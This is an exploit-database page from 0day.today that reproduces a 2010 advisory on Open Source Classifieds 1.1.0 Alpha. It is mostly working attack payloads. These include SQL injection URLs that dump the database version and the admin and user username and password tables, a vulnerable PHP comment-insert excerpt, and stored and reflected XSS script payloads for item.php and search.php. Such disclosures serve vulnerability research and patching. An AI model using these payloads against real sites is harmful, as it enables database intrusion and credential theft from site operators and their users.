[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Open Source Classifieds v1.1.0 Alpha (OSClassi) Mult Vulnerabilities

Author
Sioma Labs
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10968
Category
web applications
Date add
18-02-2010
Platform
unsorted
====================================================================
Open Source Classifieds v1.1.0 Alpha (OSClassi) Mult Vulnerabilities
====================================================================

__ _                           __       _        
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___
\ \| |/ _ \| '_ ` _ \ / _` |  / /  / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
========================================================================================
Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities
----------------------------------------------------------------------------------------
- Site      : http://osclass.org/                                                  
- Download  : http://sourceforge.net/projects/osclass/files/
- Author    : Sioma Labs
- Version   : 1.1.0 Alpha
- Tested on : WIndows XP SP2 (WAMP)
 
[-------------------------------------------------------------------------------------------------------------------------]
 
MYSQL Injection
===============
POC
http://server/item.php?id=[SQLi]
 
Basic Info
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--
 
Admin ID,Username,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--
 
User ID,UserName,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--
 
[-------------------------------------------------------------------------------------------------------------------------]
Cross Site Scripting
====================
 
Xss Source Review (item.php)
------------------------------
 
1st Xss item.php
[+]  To Work This You need to Have A iteam already posted (http://server/item.php?action=post)
------------------------------
    case 'add_comment':
        dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')",
            DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
        header('Location: item.php?id=' . $_POST['id']);
        break;
    case 'post':
------------------------------
 
[+] Put This c0de in to the comment box
"><script>alert(String.fromCharCode(88, 83, 83));</script>
 
-------------------------------
 
2nd Xss (search.php)
---------------------------------
$pattern = $_GET['pattern'];
--------------------------------
 
POC
http://server/search.php?pattern=[Xss]
Exploit
http://server/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>
 
[-------------------------------------------------------------------------------------------------------------------------]



#  0day.today [2024-12-23]  #